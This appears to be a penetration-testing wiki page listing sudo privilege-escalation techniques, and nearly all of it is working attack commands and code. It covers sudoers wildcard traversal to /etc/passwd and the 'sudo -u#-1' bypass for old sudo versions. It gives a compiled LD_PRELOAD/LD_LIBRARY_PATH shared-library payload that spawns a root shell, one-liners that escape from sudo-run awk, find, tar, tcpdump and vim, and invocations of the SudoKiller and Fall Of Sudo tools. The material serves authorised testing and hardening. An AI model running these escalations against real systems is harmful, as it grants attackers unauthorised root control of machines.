Sudo Exploits

Wildcard redirection

If a rule inside the sudoers file includes an entry with a wildcard it is possible to redirect the execution to an arbitrary file.

ubuntu ALL= (root) /bin/nano /var/log/*

The wildcard can be used to access any file as follows

sudo nano /var/log/../../etc/passwd

Security bypass

Run the following command to execute a binary as root on Sudo version < 1.8.28

sudo -u#-1 <command>

LD_PRELOAD/LD_LIBRARY_PATH

To exploit this vulnerability one the following strings must be present as a result of sudo -l

env_keep+=LD_PRELOAD
env_keep+=LD_LIBRARY_PATH

To exploit the vulnerability create a simple payload as follows

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
        unsetenv("LD_PRELOAD or LD_LIBRARY_PATH");
        setgid(0);
        setuid(0);
        system("/bin/sh");
}

Compile the payload using GCC

gcc -fPIC -shared -o <output>.so <file>.c -nostartfiles

Invoke sudo with the following parameters to execute the payload as root. The executed sudo command is not important, what really matters is to specify the path to the generated payload

sudo LD_PRELOAD=<path to .so payload> <command>
sudo LD_LIBRARY_PATH=<path to .so payload> <command>

Spawn elevated shell

The following commands allow to spawn an elevated shell from standard commands running with sudo

sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z /bin/sh
sudo tar c a.tar -I /bin/sh a
sudo vim -c '!sh'
ftp>!/bin/sh
less>! <command>

Automated discovery tools

Fall Of Sudo

Python based program that can aid in identifying misconfiurations and vulnerabilities in sudo. Can be found here.

python fallofsudo.py -i

SudoKiller

Tool that allows to identify a wide array of vulnerabilities and potential exploits works in both offline and online mode. Can be found here

Online mode

sudo_killer.sh -cer <filename> -p /<dest folder>
sudo_killer.sh -cer <filename> -p /<dest folder> -s <sudo pass>

Offline mode

Run the following command to generate the offline data set on the target machine. The generate file will be stored under /tmp/sk_offline.txt

extract.sh

Execute the following command to start the offline analysis

sudo_killer.sh -ci /tmp/sk_offline.txt
sudo_killer.sh -ci /tmp/sk_offline.txt -s <sudo pass>
PreviousWildcard ExploitsNextDocker Container

Last updated